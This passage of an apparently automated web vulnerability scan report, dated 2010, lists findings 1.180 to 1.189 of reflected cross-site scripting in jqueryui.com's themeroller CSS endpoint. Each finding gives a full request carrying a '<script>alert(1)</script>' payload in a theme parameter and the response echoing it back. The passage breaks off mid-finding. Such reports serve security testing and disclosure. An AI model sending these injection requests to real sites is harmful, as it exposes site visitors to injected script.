cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212fc267<script>alert(1)</script>1db7ecb42d6&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDe
...[SNIP]...

1.180. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorDefault request parameter is copied into the HTML document as plain text between tags. The payload 80a55<script>alert(1)</script>99652122893 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad80a55<script>alert(1)</script>99652122893&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:32 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
er=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad80a55<script>alert(1)</script>99652122893&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHo
...[SNIP]...

1.181. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorError request parameter is copied into the HTML document as plain text between tags. The payload e3e18<script>alert(1)</script>4cf3cc26974 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ece3e18<script>alert(1)</script>4cf3cc26974&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:08 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ece3e18<script>alert(1)</script>4cf3cc26974&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family
...[SNIP]...

1.182. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorHeader request parameter is copied into the HTML document as plain text between tags. The payload 8cb93<script>alert(1)</script>2054306e127 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=8888888cb93<script>alert(1)</script>2054306e127&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:16 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=8888888cb93<script>alert(1)</script>2054306e127&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent
...[SNIP]...

1.183. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorHighlight request parameter is copied into the HTML document as plain text between tags. The payload cb31c<script>alert(1)</script>f71316665e8 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555cb31c<script>alert(1)</script>f71316665e8&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:59 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555cb31c<script>alert(1)</script>f71316665e8&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityE
...[SNIP]...

1.184. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorHover request parameter is copied into the HTML document as plain text between tags. The payload 66e25<script>alert(1)</script>96f00a64c19 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd66e25<script>alert(1)</script>96f00a64c19&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:35 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd66e25<script>alert(1)</script>96f00a64c19&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&bord
...[SNIP]...

1.185. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorOverlay request parameter is copied into the HTML document as plain text between tags. The payload 2887c<script>alert(1)</script>e26ef74f3f3 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=6666662887c<script>alert(1)</script>e26ef74f3f3&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:21 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18126


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
hlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=6666662887c<script>alert(1)</script>e26ef74f3f3&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopSh
...[SNIP]...

1.186. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorShadow request parameter is copied into the HTML document as plain text between tags. The payload aa747<script>alert(1)</script>ae06a9ab634 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000aa747<script>alert(1)</script>ae06a9ab634&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:23 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18126


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
gOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000aa747<script>alert(1)</script>ae06a9ab634&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/


/* Component containers
------------------
...[SNIP]...

1.187. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the HTML document as plain text between tags. The payload 63249<script>alert(1)</script>2287361c851 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=1563249<script>alert(1)</script>2287361c851&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:52 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=1563249<script>alert(1)</script>2287361c851&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc
...[SNIP]...

1.188. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the HTML document as plain text between tags. The payload 79d6f<script>alert(1)</script>a8d1c1087c9 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=1679d6f<script>alert(1)</script>a8d1c1087c9&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:30 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
TextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=1679d6f<script>alert(1)</script>a8d1c1087c9&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconCo
...[SNIP]...

1.189. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

